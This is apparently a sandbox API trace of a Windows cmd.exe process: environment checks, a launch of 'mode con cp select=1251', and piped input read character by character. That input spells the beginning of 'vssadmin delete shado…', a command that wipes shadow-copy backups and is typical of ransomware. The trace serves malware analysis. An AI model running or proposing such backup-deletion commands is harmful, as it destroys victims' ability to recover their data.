_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0161.856] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0161.856] GetProcessHeap () returned 0x1916fa10000 [0161.856] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa17610) returned 1 [0161.856] GetProcessHeap () returned 0x1916fa10000 [0161.856] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x12) returned 0x1916fa17610 [0161.856] _get_osfhandle (_FileHandle=1) returned 0x254 [0161.856] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0161.856] _get_osfhandle (_FileHandle=0) returned 0x248 [0161.856] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0161.856] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x4253cfee50*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4253cfee28 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x4253cfee28*(hProcess=0x98, hThread=0x94, dwProcessId=0xed8, dwThreadId=0xedc)) returned 1 [0161.875] CloseHandle (hObject=0x94) returned 1 [0161.875] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0161.875] GetProcessHeap () returned 0x1916fa10000 [0161.875] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16570) returned 1 [0161.875] GetEnvironmentStringsW () returned 0x1916fa16570* [0161.875] GetProcessHeap () returned 0x1916fa10000 [0161.875] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xafe) returned 0x1916fa29540 [0161.875] FreeEnvironmentStringsA (penv="=") returned 1 [0161.875] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff8c85b0000 [0161.876] GetProcAddress (hModule=0x7ff8c85b0000, lpProcName="NtQueryInformationProcess") returned 0x7ff8c86556b0 [0161.876] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x4253cfe328, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x4253cfe328, ReturnLength=0x0) returned 0x0 [0161.876] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0xfc3bcb0000, lpBuffer=0x4253cfe360, nSize=0x7a0, lpNumberOfBytesRead=0x4253cfe320 | out: lpBuffer=0x4253cfe360*, lpNumberOfBytesRead=0x4253cfe320*=0x7a0) returned 1 [0161.876] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0168.271] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x4253cfeda8 | out: lpExitCode=0x4253cfeda8*=0x0) returned 1 [0168.271] CloseHandle (hObject=0x98) returned 1 [0168.271] _vsnwprintf (in: _Buffer=0x4253cfef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x4253cfedb8 | out: _Buffer="00000000") returned 8 [0168.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0168.271] GetProcessHeap () returned 0x1916fa10000 [0168.271] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa29540) returned 1 [0168.271] GetEnvironmentStringsW () returned 0x1916fa2ab80* [0168.271] GetProcessHeap () returned 0x1916fa10000 [0168.271] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb24) returned 0x1916fa2b6b0 [0168.271] FreeEnvironmentStringsA (penv="=") returned 1 [0168.271] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0168.271] GetProcessHeap () returned 0x1916fa10000 [0168.271] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa2b6b0) returned 1 [0168.272] GetEnvironmentStringsW () returned 0x1916fa2ab80* [0168.305] GetProcessHeap () returned 0x1916fa10000 [0168.305] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb24) returned 0x1916fa2b6b0 [0168.305] FreeEnvironmentStringsA (penv="=") returned 1 [0168.305] GetProcessHeap () returned 0x1916fa10000 [0168.305] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa17610) returned 1 [0168.305] DeleteProcThreadAttributeList (in: lpAttributeList=0x4253cfef30 | out: lpAttributeList=0x4253cfef30) [0168.305] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0169.597] ??_V@YAXPEAX@Z () returned 0x1 [0169.597] _get_osfhandle (_FileHandle=1) returned 0x254 [0169.597] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0169.597] _get_osfhandle (_FileHandle=1) returned 0x254 [0169.597] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0169.597] _get_osfhandle (_FileHandle=0) returned 0x248 [0169.597] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0169.597] GetConsoleOutputCP () returned 0x4e3 [0170.201] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0170.202] SetThreadUILanguage (LangId=0x0) returned 0x409 [0170.678] GetProcessHeap () returned 0x1916fa10000 [0170.678] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa290b0) returned 1 [0170.678] GetProcessHeap () returned 0x1916fa10000 [0170.678] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa28ee0) returned 1 [0170.678] GetProcessHeap () returned 0x1916fa10000 [0170.678] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa178d0) returned 1 [0170.678] GetProcessHeap () returned 0x1916fa10000 [0170.678] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa28e80) returned 1 [0170.678] GetProcessHeap () returned 0x1916fa10000 [0170.682] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa17880) returned 1 [0170.682] GetProcessHeap () returned 0x1916fa10000 [0170.682] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18e90) returned 1 [0170.682] GetProcessHeap () returned 0x1916fa10000 [0170.682] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16500) returned 1 [0170.682] GetProcessHeap () returned 0x1916fa10000 [0170.682] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16330) returned 1 [0170.682] GetProcessHeap () returned 0x1916fa10000 [0170.682] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa177c0) returned 1 [0170.682] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x4253cff358 | out: _Buffer="\r\n") returned 2 [0170.682] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.682] GetFileType (hFile=0x254) returned 0x3 [0170.682] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.682] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0170.682] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4253cff328, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff328*=0x2, lpOverlapped=0x0) returned 1 [0170.682] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0170.682] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb10080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0170.682] _vsnwprintf (in: _Buffer=0x1916fb20060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x4253cff368 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0170.682] _vsnwprintf (in: _Buffer=0x1916fb20086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x4253cff368 | out: _Buffer=">") returned 1 [0170.682] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.682] GetFileType (hFile=0x254) returned 0x3 [0170.682] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.683] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0170.683] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4253cff358, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff358*=0x14, lpOverlapped=0x0) returned 1 [0170.683] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.683] GetFileType (hFile=0x248) returned 0x3 [0170.683] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.683] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.683] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.683] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0170.683] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.683] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.683] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.683] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0170.683] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.683] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.683] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.683] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0170.683] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.683] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.683] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.683] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.684] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.684] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.684] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.684] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.684] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.684] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.684] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.684] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.684] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.684] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c40, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0170.684] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.684] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.685] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.685] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c42, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0170.685] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.685] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.685] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.685] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c44, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0170.685] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.685] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.685] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.702] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c46, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0170.702] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.702] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.702] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.702] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c48, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0170.702] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.702] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.702] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.702] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0170.702] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.702] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.702] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.702] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0170.702] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.702] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.702] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.702] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0170.702] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.702] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.703] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.703] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c50, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0170.703] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.703] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.703] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.703] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c52, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0170.703] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.703] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.703] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.703] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c54, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0170.703] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.703] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.703] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.703] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c56, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0170.703] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.703] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.703] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.703] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c58, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0170.703] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.703] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.709] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.710] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5a, 